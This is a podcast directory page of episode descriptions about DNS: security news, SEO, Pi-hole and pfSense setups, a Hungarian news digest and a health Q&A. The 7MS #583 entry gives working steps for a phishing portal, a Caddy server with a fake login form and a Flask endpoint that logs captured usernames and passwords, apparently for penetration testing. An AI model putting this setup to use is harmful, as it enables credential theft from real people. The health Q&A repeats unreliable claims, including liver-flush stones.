Podcasts about dns

Hierarchical distributed naming system for computers, services, or any resource connected to the Internet or a private network

  • Podcasts: 1,338
  • Episodes: 3,268
  • Average duration: 44m
  • Weekly new episodes: 5
  • Latest: Sep 21, 2023


Latest podcast episodes about dns

Ethereum Daily - Crypto News Briefing
Aztec Testnet For Private Smart Contracts

Sep 21, 2023 (3:54)


Aztec releases a local testnet for private smart contracts. L2Beat introduces a new TVL framework. Balancer suffers a DNS hijack attack. And the Holesky testnet is set to relaunch on September 28th.

AWS Morning Brief
Overscoped Role? No, It's the Children Who Are Wrong

Sep 14, 2023 (3:38)


Last week in security news: Corey reported an over-scoped role to AWS security, the bad LastPass breach got even worse, how to enforce DNS name constraints in AWS Private CA, and more!

Links:
  • I reported an over-scoped role to AWS security; the response from the SageMaker Canvas team was that it's working as intended.
  • The bad LastPass breach that continues to get worse once again somehow got worse.
  • Microsoft has published a rather thorough postmortem about how their signing key was leaked.
  • A security newsletter features a scam that I reported via Twitter.
  • Google has gone from paragon of security to apparently now sharing aspects of your browsing history with websites in Chrome.
  • Establishing a data perimeter on AWS: Allow access to company data only from expected networks
  • How to enforce DNS name constraints in AWS Private CA
  • Tool of the week: ThreatMapper hunts for threats in your production platforms, and ranks these threats based on their risk-of-exploit.

We Don't PLAY
Old SEO Vs New SEO: What Side Are You On?

Sep 13, 2023 (65:01)


Old SEO vs New SEO is a big topic for discussion! This episode will get you straight. Read this article on Old SEO vs New SEO for more details.

--------- EPISODE SUMMARY ---------

Prepare to amplify your online presence like never before. As we dive into the heart of Search Engine Optimization, you'll acquire the tools and knowledge to make your website a magnetic force for your target audience. Strap in, as we embark on a comprehensive journey through the evolution of SEO, from old to new strategies, exploring how to use your website to drive more traffic, enhance visibility, and ultimately, grow your business. We'll unleash insights into the intricate world of SEO - keyword optimization, website management, DNS records and more, all tailored to propel your business onto the forefront of search engine results. We'll discuss the power of compelling content and the importance of an organized page structure. Learn how to add context to your articles, how to make your business stand out with a 'word cloud,' and how to protect your domain as a valuable asset. But we're not just about the technicalities. We also delve into the human side of SEO. We'll show you how to make your website inviting to visitors, how to use filters effectively, how to solve a problem for your audience, and how to write articles that will rank organically. By the end of this episode, whether you're a beginner or an SEO expert, you'll have unlocked a treasure trove of SEO wisdom that will transform your online business. So, what are you waiting for? Let's get started!

--------- EPISODE CHAPTERS WITH SHORT KEY POINTS ---------

(0:00:03) Exploring Old and New SEO Strategies: We discuss SEO, building a house to express feelings, using filters to position in search, and thanking Rocky for his service.
(0:05:59) The Evolution of SEO Strategies: We discuss filters, content pillars, page structure, time management, and digital marketing strategies.
(0:19:33) New SEO and Keyword Optimization Way: Word clouds help businesses be seen, compare options, create content to rank higher, and automate decisions.
(0:27:43) SEO and URL for Business Growth: We create commercial assets to build value, create content, solve problems, and increase website awareness.
(0:35:56) Optimizing SEO for Personal Branding: We analyze keywords in SEO to increase visibility, create content with key phrases, and use a "word cloud" to build value.
(0:49:12) The Importance of Owning Your Domain: Owning a domain, subdomains, exact match domains, hosting platforms, digital real estate, Google Search Console, content pillars, page structure, and multiple assets are discussed to build an online presence.
(0:56:30) Understanding SEO and Website Management: We explore the importance of domain ownership, keywords, and commercial assets for SEO success.
(1:04:15) Understanding DNS Records and Name Servers: We discuss domain and name servers, DNS records, A records, MX records, TXT records, CNAME records, and name servers for secure domain functionality.

--------- EPISODE KEYWORDS ---------

SEO, Website Management, Domain, DNS Records, Name Servers, Keyword Optimization, Content Pillars, Page Structure, Word Cloud, Filters, Problem Solving, Organic Ranking, Commercial Assets, Domain Ownership, Digital Real Estate, Google Search Console, A Records, MX Records, TXT Records, CNAME Records

NEW SEO COURSE RELEASED

The Demystifying SEO mini-course is designed to provide marketers and business owners with a clear understanding of the significance of SEO & CRO in driving organic traffic with sales for higher website visibility & conversions. Email me at favour@playinc.online. Grab My Virtual Business Card here: https://poplme.co/hash/lQZ4jOcr/2/s

Send in a voice message: https://podcasters.spotify.com/pod/show/wedontplay/message

Infoblox ThreatTalk
Meet the Authors: DNS Insecurity, or DNS in Security?

Sep 6, 2023 (29:01)


Is your DNS a security risk, or are you taking advantage of its strengths as a security tool? In this episode of ThreatTalk, we talk with Josh Kuo and Ross Gibson about their new security book titled "The Hidden Potential of DNS in Security." The first of a 3-part series, we will discuss highlights from the book and the use cases that drove them to produce such a comprehensive reference on a commonly overlooked security resource.

Learn more about The Hidden Potential of DNS in Security: https://a.co/d/dsE2gyp

Tune in to the live broadcast on LinkedIn and Facebook every first and third Tuesday of the month at 11:00 am (PST). Subscribe to the ThreatTalk podcast on Apple Podcasts, Spotify, SoundCloud, PocketCasts or your favorite podcast app.

Hacker Public Radio
HPR3937: Adventures in Pi-Hole

Sep 5, 2023


Adventures in Pi-hole

Hi all! Today I'm gonna be talking about my adventures in setting up Pi-hole. This will be without screenshots, but instead in all text, sorry! Also this is all written as kind of an "Aftermath" story. This is being written after the fact, so this might be missing some details, but most of it is there.

Intro: What is Pi-hole

Pi-hole is a DNS/DHCP server that allows for easy network-wide ad-blocking, along with all the nice customizations that come with being a DNS server, such as custom domains.

First Step: Get it running

The first step was getting Pi-hole running. I did this using Docker Compose on a "NAS" which is honestly a full-on server at this point. A quick copy/paste from Pi-hole's README and I was up and running! I set a single system to use this as a DNS server, and after that, I figured I was set and ready to go.

Second Step: DHCP town

Of course, I wasn't satisfied just finishing there. I want automatic DNS setting for any device that connects to my network. Of course, I could just set the DNS upstream in my OpenWRT router to use the IP address of my server, but that isn't good enough for me. This means I'd be missing out on automatic per-client information, since when setting a DNS server for OpenWRT, it only sets itself to forward any DNS requests up to the DNS server, which means from Pi-hole's perspective, all the requests are coming from the router and nowhere else. The solution is to set up Pi-hole as a DHCP server. Keep in mind this isn't a tutorial, so let's go through what I did first. The first step was to turn on the DHCP server in Pi-hole. This was super easy, just a checkbox and click save. Cool! Then I disabled the DHCP server in OpenWRT, and that was all set. A few restarts of network devices later, like my phone, and they automatically connected to the Pi-hole server, and worked like a charm.

Next up, I set up Tailscale. I use Headscale, but the setup is essentially the same as if you were using Tailscale's UI. Set in the config to override local DNS, set the nameserver to the Tailscale IP address of the server, and turn on MagicDNS, et voilà! Now to restart the Tailscale nodes, and make sure that on the server, you set it to not accept the DNS from Tailscale. If you don't do that, it'll get in an endless loop of trying to use itself as the DNS server, and it's just no good. Okay! It's all set, and I check the dashboard, and it's already blocking DNS requests. Perfect!

Third Step: Whoopsies!

This was fine and great, but when I went to reboot my server, which I do weekly, something bad happened. The interface for the server didn't come up. This is a problem, since it's the DHCP server for my network, so without that working, the network was dead in the water. It can't give out IP addresses. What's going on? I go ahead and access my server directly. No matter how hard I try, it can't connect to the interface. What's the big deal? Well, this is pretty simple, and a question popped into my head that got me there: "How does this server even get its IP address?" You see, when I set up Pi-hole, it just kept using the IP address that the router gave it, which it was more than happy to use, but the moment the router didn't have a DHCP server, the NAS didn't have a way to get an IP address anymore. So what do you do then? The answer is pretty simple. Give the server a static IP. Make sure in the DHCP server of Pi-hole, you set a reservation in it for the server, then in NetworkManager, which I use, set it to have a static IP, and set its DNS to point to localhost. Perfect! This works like a charm!

Fourth Step: Adlists

Okay, phew! Crisis averted. Just some missing networking knowledge. So what's next up on the list? Hmmm... Let's see... The default adlist is kinda small, let's go see if we can find some new adlists. Apparently this is more difficult than you'd think. A quick search on DDG only came up with an equivalent search in GitHub. Not useful! I have no idea of the trustworthiness and stability of these adlists. Let's see. Another search leads to a Reddit article that then links to a different list. Bingo! An adlist list. Exactly what I needed. I went ahead and looked into these lists, and added a few of them. Perfect!

Fifth Step: Maintenance

    docker compose pull && docker compose up -d

Of course, this isn't it. I actually use an A/B update scheme, but you get the gist. Updates are taken care of, and just make sure you try and keep the server up as long as possible, and keep downtime to a minimum.

Sixth Step: Moving off the NAS

After a while of running this, the necessity of having the NAS on the whole time was starting to get frustrating. The answer there was to move it off the NAS. I did this by installing it on a Raspberry Pi 3B, running Arch Linux ARM. The setup was identical to before once I had gotten ALARM running.

THINK Business with Jon Dwoskin
Building Business Without Capital

Aug 31, 2023 (23:49)


Yegor Sak is the co-founder of Windscribe, a free VPN and ad blocker that has over 43 million active users. With tens of thousands of competitors, Windscribe has also been rated as one of the best VPNs on the market, and they've been able to pull it off with a team of less than 40 people. Yegor started and grew Windscribe with zero outside capital, made the business profitable by month two, and it currently does around $3M in annual revenue. He was born in Belarus and didn't have access to the internet until his family moved to Canada when he was 12. Shortly after getting internet access, Yegor developed a passion for programming and creating websites, and as a teenager, he worked on several websites that earned him money. One of the first websites he created had people paying him to buy iPods and game consoles and smash them into pieces. A video he made smashing a PS3 was in the top 10 YouTube videos of all time in 2016, and over two years, this website earned him over $60,000. He is also the founder of ControlD, a fully customizable DNS service that allows you to not only block annoyances like malware, tracking, ads, or IoT telemetry but also unblock over 200 services through a network of servers in over 100 cities. All without any apps to install.

Connect with Jon Dwoskin:
Twitter: @jdwoskin
Facebook: https://www.facebook.com/jonathan.dwoskin
Instagram: https://www.instagram.com/thejondwoskinexperience/
Website: https://jondwoskin.com/
LinkedIn: https://www.linkedin.com/in/jondwoskin/
Email: jon@jondwoskin.com
Get Jon's Book: The Think Big Movement: Grow your business big. Very Big!

Connect with Yegor Sak:
Website: https://windscribe.com/
Twitter: https://twitter.com/yegor?lang=en
Instagram: https://www.instagram.com/windscribe/
LinkedIn: https://www.linkedin.com/in/yegor-sak-725330b2/
Facebook: https://www.facebook.com/windscribe/

The CyberWire
Name collision. Spawn of LockBit. Quishing the unwary and the hasty. Trends in healthcare cybersecurity. Inquiries surrounding Russia's hybrid war against Ukraine.

Aug 29, 2023 (25:54)


Name collision as a DNS risk. A LockBit derivative is active against targets in Spain. QR codes as phishbait. Cybersecurity trends in healthcare. A Russian hacktivist auxiliary hits Polish organizations, while investigation of railroad incidents in Poland continues. Ben Yelin looks at the SEC cracking down on NFTs. Mr. Security Answer Person John Pescatore opens up the listener mail bag. And a look at a probably accidental glitch affecting air travel in the UK. For links to all of today's stories check out our CyberWire daily news briefing: https://thecyberwire.com/newsletters/daily-briefing/12/164

Selected reading:
  • What's in a name? Strange behaviors at top-level domains creates uncertainty in DNS (Cisco Talos)
  • Spain warns of LockBit Locker ransomware phishing attacks (BleepingComputer)
  • Think Before You Scan: The Rise of QR Codes in Phishing (Trustwave SpiderLabs)
  • 78% of Healthcare Organizations Experienced Cyber Incidents in Past Year, 60% of Which Impacted Patient Care (Claroty)
  • Polish stock exchange, banks knocked offline by pro-Russian hackers (Cybernews)
  • Two Men Arrested Following Poland Railway Hacking (SecurityWeek)
  • Century-old technology hack brought 20 trains to a halt in Poland (Cybernews)
  • Poland investigates train mishaps for possible Russian connection (Washington Post)
  • Flight chaos 'to last for days' after air traffic control failure (The Telegraph)
  • UK flight chaos could last for days, airline passengers warned (the Guardian)
  • Government can't rule out cyber attack caused air traffic chaos (MSN)

Learn more about your ad choices. Visit megaphone.fm/adchoices

Hírstart Robot Podcast - Friss hírek
A new Russian textbook commissioned by Putin calls the 1956 revolutionaries fascists

Aug 27, 2023 (5:00)


A new Russian textbook commissioned by Putin calls the 1956 revolutionaries fascists. Telex, 2023-08-27 13:42:37, Foreign affairs. Vladimir Putin, Start of school, 1956. The Putin regime's new textbook speaks of radicals with a fascist past and of Western operations when it mentions the Hungarians, specifically 1956. The textbook also speaks of the flourishing of the Soviet Union and of how Putin lifted Russia up.

Hungarian Alza has also started selling the utility-bill-cutting product that you can buy but not use. G7, 2023-08-27 13:21:20, Economy. It is becoming ever more pressing to clarify, both legally and technically, what buyers may do with balcony solar systems, now that the second-largest Hungarian e-retailer has also begun selling them.

Street-name championship: Petőfi leads ahead of Kossuth and Ady. 24.hu, 2023-08-27 14:54:41, Domestic. Anyone can observe that on entering a Hungarian town you almost inevitably meet certain street names. Budapest is a curiosity of its own.

A Russian paper has revealed serious oddities about Prigozhin's plane. Portfolio, 2023-08-27 14:41:00, Foreign affairs. Airplane, Prigozhin. Yevgeny Prigozhin's Embraer 600 private jet sat in a hangar for months, and during that time the aircraft's cabin was moreover frequently opened for extended periods, MK.ru writes.

Good news for millions of Hungarian pensioners: they will almost certainly get a raise this year. Pénzcentrum, 2023-08-27 11:30:00, Economy. Inflation, Pension. It very much looks as though a question important to pensioners may soon be settled. In recent months, millions of Hungarian pensioners have been waiting to find out which scenario will apply to this year's inflation.

The starting grid of the F1 Dutch Grand Prix. F1világ, 2023-08-27 10:58:54, Formula 1. Netherlands, Max Verstappen, Red Bull. Red Bull's world champion driver Max Verstappen took his 8th pole position of the year and the 28th of his Formula 1 career at the Formula 1 Dutch Grand Prix.

Italy's former prime minister: the West's strategy for Ukraine has failed. vg.hu, 2023-08-27 10:29:20, Foreign affairs. Ukraine war, Italy, Refugee, Propaganda, Giuseppe Conte. After a year and a half of war, what is the reality that prevails over the simple predictions pumped out by war propaganda? asks Giuseppe Conte in his article. The reality is 500 thousand dead on both fronts and more than six million Ukrainian refugees.

Márki-Zay promised Gyurcsány during the campaign that he would hold him to account. HírTV, 2023-08-27 12:20:00, Domestic. Campaign, Ferenc Gyurcsány. According to the opposition's failed candidate for prime minister, financial transactions may have taken place behind his back.

A mother is three years older than her children after giving birth from embryos frozen thirty years ago. Noizz, 2023-08-27 11:42:03, Lifestyle. Donation, Christianity, Embryo. Rachel Ridgeway, a mother of six, is technically three years older than her newborn twins. The embryos, frozen in 1992, were implanted in the young woman's womb with the help of a Christian donation center, and she gave birth to Timothy and Lydia.

Rock music the way the party likes it. 444.hu, 2023-08-27 14:26:08, Foreign affairs. China, Communist. The communist party's youth organization simply rewrote the lyrics of one of the most influential Chinese indie-rock songs. The gloomy, dejected track became optimistic and positive. That, however, is even more depressing.

Was Prigozhin on the crashed plane or not? The Russians have published the result of the DNA test (DNS in Hungarian). Privátbankár, 2023-08-27 13:18:04, Foreign affairs. Investigator, Prigozhin, DNA, Air disaster. Yevgeny Prigozhin's name was on the passenger list, and Russian investigators have now examined the remains as well.

"Once upon a time there was a little girl in Scotland who was really a little boy." Büntető.com, 2023-08-27 12:45:41, Football. Italy, Scotland, Women's football. Rose Reilly is one of the pioneers of women's football: the Scottish lady whom nobody could stop from fulfilling her dream of becoming a footballer. She won the Italian championship nine times in all, and in 1978 and 1981 she was also top scorer.

F1: Verstappen may lose his home race even as he dominates. Vezess, 2023-08-27 11:44:17, Formula 1. Netherlands, Max Verstappen. Although the Dutch Grand Prix is a huge success, it may be held only every two years after 2025, the Formula 1 CEO said.

We won't have to wait long for relief. Kiderül, 2023-08-27 13:05:23, Weather. Heatwave. On Monday we can still expect heat nationwide, then on Tuesday a cold front will pass over the country, ending the August heatwave in Hungary by midweek.

Brad & Will Made a Tech Pod.
197: The Pigs Go Ham

Aug 27, 2023 (85:05)


Another piping-hot batch of questions is here straight out of the oven (where "the oven" is Discord and our inbox), and we do our best to deliver answers about amassing a collection of Allen wrenches, the seeming fragility of OLED panels, service-nagging from your smart appliances, running dynamic DNS for your home VPN, books about computer history, peated whiskey, and more!

Support the Pod! Contribute to the Tech Pod Patreon and get access to our booming Discord, your name in the credits, and other great benefits! You can support the show at: https://patreon.com/techpod

The Cabral Concept
2760: Metformin, Eating Fruit, Rheumatoid Arthritis, Blood Test for RA, Daily Cruciferous Veggies (HouseCall)

Aug 27, 2023 (17:50)


Thank you for joining us for our 2nd Cabral HouseCall of the weekend! I'm looking forward to sharing with you some of our community's questions that have come in over the past few weeks…

Stacey: Hi Dr. Cabral, I hope you are having a wonderful day! I have a quick question for ya. What is your opinion on Metformin? My functional medicine Dr./endocrinologist prescribed it to me to help with insulin resistance & some of my dysautonomia symptoms like sensory sensitivity etc. I've been reading the book Lifespan from Dr. David Sinclair and he brings up amazing things Metformin is used for and in some countries you don't even need a prescription for it etc. I found it to be very interesting and I'm considering trying it but still nervous. Have you dug deep in the metformin rabbit hole? What's your opinion? Thanks for everything.

Ryan: Hello Dr. Cabral, I want you to know I'm learning so much from you and I'm extremely thankful! I have a question for you on your opinion of Medical Medium's approach to healing with all that fruit? I'm learning a lot from you and have done several protocols as well as detoxing and Fatlosity. I still have issues with a fatty liver, hypothyroidism, hormonal imbalances etc. Some have been sharing their healing through Medical Medium's protocols & detoxes even through your group page. I bought his books and a lot makes sense, yet eating all of that fruit being pre-diabetic sits hard with me, even though he claims it will reverse all these conditions. I'm confusing myself with all the different books I read, podcasts etc. I have done your big 5 labs.

Robert: Hi Dr. Cabral. I have found your podcasts incredibly valuable, so thank you so much for all you do, it is very much appreciated. I recently went to acupuncture and did a Quantum Resonance Magnetic Analyzer Handheld Health Detector Analyzer which showed I have a moderate level of Rheumatoid Arthritis coefficient. I don't have the symptoms of RA, but my acupuncturist believes I might be pre-RA. I have very high anxiety as shown on an OAT, so am working on reducing that and have ordered the CBO protocol. I would be interested in hearing your story of how you recovered. Did you have joint pain with your RA or did you just have pre-RA? Were you on medication too before you healed naturally? Any other advice for me to not go from pre-RA to RA? Thank you again!

Robert: Sorry Dr. Cabral, me again. Just a follow-up from my question… as you haven't had RA for a long time now, does it still show up in your blood test (i.e. elevated ESR), or does your blood test show no signs of the disease? Thanks again.

Amanda: Hello Dr. I am a 34 y.o. dentist, vata type. I suffer from many floaters, tinea versicolor, white spots on nails, and a left ear that always pounds/heart beat audible. I have a weird tingling between shoulder blades right after eating. If I eat cruciferous veggies daily @ 1 serving, my palms and soles turn bright YELLOW, and turned yellow while pregnant 2 years ago. Milk thistle and liver herbs also cause tingling in my back. Tried the DNS for 4 months (and 21 day detox) but it didn't help the yellowing. I did your liver flush once and passed hundreds of stones. Why would one turn yellow after crucifers? Are they not good for me? Or do you think phase I, II or 2.5 detox is impaired? If you could provide any explanation about the yellowing and/or solutions and root causes for my symptoms? Thanks!

Thank you for tuning into this weekend's Cabral HouseCalls and be sure to check back tomorrow for our Mindset & Motivation Monday show to get your week started off right!

Show Notes and Resources: StephenCabral.com/2760

Get a FREE Copy of Dr. Cabral's Book: The Rain Barrel Effect

Join the Community & Get Your Questions Answered: CabralSupportGroup.com

Dr. Cabral's Most Popular At-Home Lab Tests:
  • Complete Minerals & Metals Test (Test for mineral imbalances & heavy metal toxicity)
  • Complete Candida, Metabolic & Vitamins Test (Test for 75 biomarkers including yeast & bacterial gut overgrowth, as well as vitamin levels)
  • Complete Stress, Mood & Metabolism Test (Discover your complete thyroid, adrenal, hormone, vitamin D & insulin levels)
  • Complete Food Sensitivity Test (Find out your hidden food sensitivities)
  • Complete Omega-3 & Inflammation Test (Discover your levels of inflammation related to your omega-6 to omega-3 levels)

Get Your Question Answered On An Upcoming HouseCall: StephenCabral.com/askcabral

Would You Take 30 Seconds To Rate & Review The Cabral Concept? The best way to help me spread our mission of true natural health is to pass on the good word, and I read and appreciate every review!

WordPress Resource: Your Website Engineer with Dustin Hartzler

In this episode, we dive into the world of WordPress and web infrastructure, exploring the often mysterious realm of DNS settings.

Good Morning Gwinnett Podcast
Talk Business Tuesday: What To Expect When You Migrate Your DNS

Aug 15, 2023 (8:13)


https://www.GoodMorningGwinnett.com Listen to the show Monday-Thursday at 10am. Learn all about people and places around Gwinnett County. Hey if you're enjoying the show, horoscope & morning inspiration, help me keep up the good feelings by buying me a cup of coffee. Just click the link below. https://www.buymeacoffee.com/AudreyBK

Embracing Change: The Emotional Landscape of DNS Migration

Changing the DNS of your website is not just a technical shift; it's an emotional journey that mirrors life's ups and downs. Anticipation blends with uncertainty as you embark on enhancing your online presence. Nostalgia for the old system mingles with the need to let go, while fear of disruption battles with a newfound sense of empowerment. Frustration arises from technical hiccups, but each challenge becomes a chance to learn and grow. With the migration's completion, relief washes over you, transitioning into a profound feeling of achievement. As the new DNS settles in, adaptation takes hold – you're exploring a new digital landscape, fortified by the resilience gained from weathering the storm of change. This process, a delicate dance of emotions and technicalities, underlines the commitment you hold for a seamless online experience. Ultimately, the DNS migration journey is a testament to your ability to navigate change's tumultuous waters while crafting an even stronger digital presence.

Good Morning Gwinnett Podcast
Talk Business Tuesday: What To Expect When You Migrate Your DNS

Good Morning Gwinnett Podcast

Play Episode Listen Later Aug 15, 2023 0:43


https://www.GoodMorningGwinnett.com Listen to the show Monday-Thursday at 10am. Learn all about people and places around Gwinnett County. Hey if you're enjoying the show, horoscope & morning inspiration, help me keep up the good feelings by buying me a cup of coffee. Just click the link below. https://www.buymeacoffee.com/AudreyBK___________________________________________**Embracing Change: The Emotional Landscape of DNS Migration**Changing the DNS of your website is not just a technical shift; it's an emotional journey that mirrors life's ups and downs. Anticipation blends with uncertainty as you embark on enhancing your online presence. Nostalgia for the old system mingles with the need to let go, while fear of disruption battles with a newfound sense of empowerment. Frustration arises from technical hiccups, but each challenge becomes a chance to learn and grow.With the migration's completion, relief washes over you, transitioning into a profound feeling of achievement. As the new DNS settles in, adaptation takes hold – you're exploring a new digital landscape, fortified by the resilience gained from weathering the storm of change. This process, a delicate dance of emotions and technicalities, underlines the commitment you hold for a seamless online experience. Ultimately, the DNS migration journey is a testament to your ability to navigate change's tumultuous waters while crafting an even stronger digital presence.

Good Morning Gwinnett Podcast
Talk Business Tuesday: What To Expect When You Migrate Your DNS

Good Morning Gwinnett Podcast

Play Episode Listen Later Aug 15, 2023 10:02


https://www.GoodMorningGwinnett.com Listen to the show Monday-Thursday at 10am. Learn all about people and places around Gwinnett County. Hey if you're enjoying the show, horoscope & morning inspiration, help me keep up the good feelings by buying me a cup of coffee. Just click the link below. https://www.buymeacoffee.com/AudreyBK___________________________________________**Embracing Change: The Emotional Landscape of DNS Migration**Changing the DNS of your website is not just a technical shift; it's an emotional journey that mirrors life's ups and downs. Anticipation blends with uncertainty as you embark on enhancing your online presence. Nostalgia for the old system mingles with the need to let go, while fear of disruption battles with a newfound sense of empowerment. Frustration arises from technical hiccups, but each challenge becomes a chance to learn and grow.With the migration's completion, relief washes over you, transitioning into a profound feeling of achievement. As the new DNS settles in, adaptation takes hold – you're exploring a new digital landscape, fortified by the resilience gained from weathering the storm of change. This process, a delicate dance of emotions and technicalities, underlines the commitment you hold for a seamless online experience. Ultimately, the DNS migration journey is a testament to your ability to navigate change's tumultuous waters while crafting an even stronger digital presence.

Good Morning Gwinnett Podcast
Talk Business Tuesday: What To Expect When You Migrate Your DNS

Good Morning Gwinnett Podcast

Play Episode Listen Later Aug 15, 2023 2:29


https://www.GoodMorningGwinnett.com Listen to the show Monday-Thursday at 10am. Learn all about people and places around Gwinnett County. Hey if you're enjoying the show, horoscope & morning inspiration, help me keep up the good feelings by buying me a cup of coffee. Just click the link below. https://www.buymeacoffee.com/AudreyBK___________________________________________**Embracing Change: The Emotional Landscape of DNS Migration**Changing the DNS of your website is not just a technical shift; it's an emotional journey that mirrors life's ups and downs. Anticipation blends with uncertainty as you embark on enhancing your online presence. Nostalgia for the old system mingles with the need to let go, while fear of disruption battles with a newfound sense of empowerment. Frustration arises from technical hiccups, but each challenge becomes a chance to learn and grow.With the migration's completion, relief washes over you, transitioning into a profound feeling of achievement. As the new DNS settles in, adaptation takes hold – you're exploring a new digital landscape, fortified by the resilience gained from weathering the storm of change. This process, a delicate dance of emotions and technicalities, underlines the commitment you hold for a seamless online experience. Ultimately, the DNS migration journey is a testament to your ability to navigate change's tumultuous waters while crafting an even stronger digital presence.

Good Morning Gwinnett Podcast
Talk Business Tuesday: What To Expect When You Migrate Your DNS

Good Morning Gwinnett Podcast

Play Episode Listen Later Aug 15, 2023 4:52



NoLimitSecu
Hors Série – Souveraineté Numérique – DNS et routage

NoLimitSecu

Play Episode Listen Later Aug 13, 2023 38:29


Special episode: Digital Sovereignty. Part 1: DNS, routing and domain names. With Stéphane Bortzmeyer. The post Hors Série – Souveraineté Numérique – DNS et routage appeared first on NoLimitSecu.

Course Wizards
The Pros and Cons of the Most Popular Domain Name Registrars

Course Wizards

Play Episode Listen Later Aug 9, 2023 9:51


Introduction

In this episode, we'll be discussing domain name registrars. We'll talk about what they are, how they work, and how to choose the best one for your needs.

What is a domain name registrar?

A domain name registrar is a company that registers and sells domain names. When you buy a domain name from a registrar, you're essentially renting it for a certain amount of time. The registrar is responsible for keeping track of who owns the domain name and making sure that it's properly pointed to your website.

How do domain name registrars work?

When you buy a domain name from a registrar, they'll add your name and contact information to a database called the Domain Name System (DNS). The DNS is a big list of all the domain names in the world and their corresponding IP addresses. When someone types your domain name into their browser, their computer will query the DNS to find the IP address of your website.

How to choose the best domain name registrar for you

There are a few factors to consider when choosing a domain name registrar. These include:

Price: Domain name registrars typically charge different prices for domain names. It's important to compare prices before you buy a domain name.

Features: Different registrars offer different features, such as free domain privacy, email forwarding, and DNSSEC. Make sure to choose a registrar that offers the features you need.

Customer support: If you have any problems with your domain name, you'll need to contact the registrar's customer support team. Make sure to choose a registrar with a good reputation for customer support.

Popular domain name registrars

Here are some of the most popular domain name registrars: Domain.com, Namecheap, Bluehost, Google Domains, GoDaddy, HostGator, Name.com, NameSilo, Dynadot, DreamHost

https://url.amit.so/bio

Dr. NoSleep | Scary Horror Stories
Get Haunted on the Dark Web

Dr. NoSleep | Scary Horror Stories

Play Episode Listen Later Aug 7, 2023 17:35


Big thanks to my sponsors for helping support the podcast! :) BetterHelp: This episode is brought to you by BetterHelp. Go to betterhelp.com/dns today to get 10% off your first month. Be sure to use promo code DNS during sign up. Factor: Head to FactorMeals.com/nosleeppod50 today and use code nosleeppod50 to get 50% off! * * *

All Jupiter Broadcasting Shows
Practical Privacy | LINUX Unplugged 522

All Jupiter Broadcasting Shows

Play Episode Listen Later Aug 6, 2023


Why Linux reigns for privacy; our recommendations for secure tools from chat to DNS.

Bitcoin, Blockchain, and the Technologies of Our Future
pfSense Deep Dive: Unbound Explained!

Bitcoin, Blockchain, and the Technologies of Our Future

Play Episode Listen Later Aug 5, 2023 13:19


https://youtu.be/c-bDpZoG--w
https://open.lbry.com/@NaomiBrockwell:4/pfsense-deep-dive:5

Consumer grade routers are like leaky boats. But you can beef up your setup using things like the pfSense open source router and firewall software. In previous videos we've looked specifically at DNS settings, and programs like "Unbound" within pfSense. While these grant you granular control over your home network, they can also be confusing.

This video dives deeper into "Unbound", the DNS resolver on pfSense, and explains what each of its many settings means so that you can get a better understanding of just what it's capable of.

00:00 Intro
01:09 DNS/pfSense Recap
02:22 Unbound Settings Explained
11:00 DNS Forwarder Explained
11:38 Conclusion

pfSense is a great tool that gives your router a power-up, enabling greater control, enhancing security, and the ability to set up more privacy for your internet activities.

Special Thanks to John Todd for guiding us through the tutorial process!

More information on Quad9: https://quad9.net/

Brought to you by NBTV team members: Lee Rennie, Sam Ettaro, Cube Boy, Reuben Yap, Will Sandoval and Naomi Brockwell

To support NBTV, visit https://www.nbtv.media/support (tax-deductible in the US)

NBTV's new eBook out now! Beginner's Introduction To Privacy - https://amzn.to/3WDSfku

Beware of scammers, I will never give you a phone number or reach out to you with investment advice. I do not give investment advice.

Visit the NBTV website: https://nbtv.media

Support the show

7 Minute Security
7MS #583: Cred-Capturing Phishing with Caddy Server

7 Minute Security

Play Episode Listen Later Aug 4, 2023 29:37


Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu:

sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https
curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg
curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list
sudo apt update
sudo apt install caddy -y

Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet), just put the domain name in the Caddyfile:

domain.com

Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make an index.html with a basic phishing portal: Your rad awesome eyeball cool phishing portal! body { background-image: url("https://tangent.town/static/background.jpg"); background-repeat:no-repeat; background-size:cover; } User Name: Password: Unauthorized use is prohibited!

This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal.

One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher:

from flask import Flask, request

app = Flask(__name__)

@app.route('/capture', methods=['POST'])
def capture():
    print(request.form)
    return 'OK', 200

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

If you don't have Flask installed, do this:

sudo apt install python3-pip -y
sudo pip install Flask

Run this file in one session, then in your index.html file make a small tweak in the form action directive: Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!

Interviews by The Smart Chiropractor
Applying DNS in a Sports Practice with Dr. Michael Rintala

Interviews by The Smart Chiropractor

Play Episode Listen Later Jul 31, 2023 20:55


Based out of sunny San Diego, Dr. Michael Rintala operates a private practice and holds a unique blend of qualifications. He first gained his BA in Psychology before diving into the world of chiropractic medicine. His holistic approach to patient care has been greatly influenced by the Prague School of Rehabilitation, where he has been studying the principles and techniques of Dynamic Neuromuscular Stabilization. Stay tuned as we dive into how he leverages DNS within his own sports-focused practice.

Dr. NoSleep | Scary Horror Stories
3 Doorbell Camera Horror Stories

Dr. NoSleep | Scary Horror Stories

Play Episode Listen Later Jul 28, 2023 20:27


Big thanks to my sponsors for helping support the podcast! :) Factor: Head to FactorMeals.com/nosleeppod50 today and use code nosleeppod50 to get 50% off! BetterHelp: This episode is brought to you by BetterHelp. Go to betterhelp.com/dns today to get 10% off your first month. Be sure to use promo code DNS during sign up. * * *

Check Point CheckMates Cyber Security Podcast

Ralph Bonnell did a great session on DNS as a CheckMates TechTalk. You can access the materials (including some Q&A) here.

Bitcoin, Blockchain, and the Technologies of Our Future
DNS Blocklists Explained! Stop Internet Snooping!

Bitcoin, Blockchain, and the Technologies of Our Future

Play Episode Listen Later Jul 27, 2023 16:41


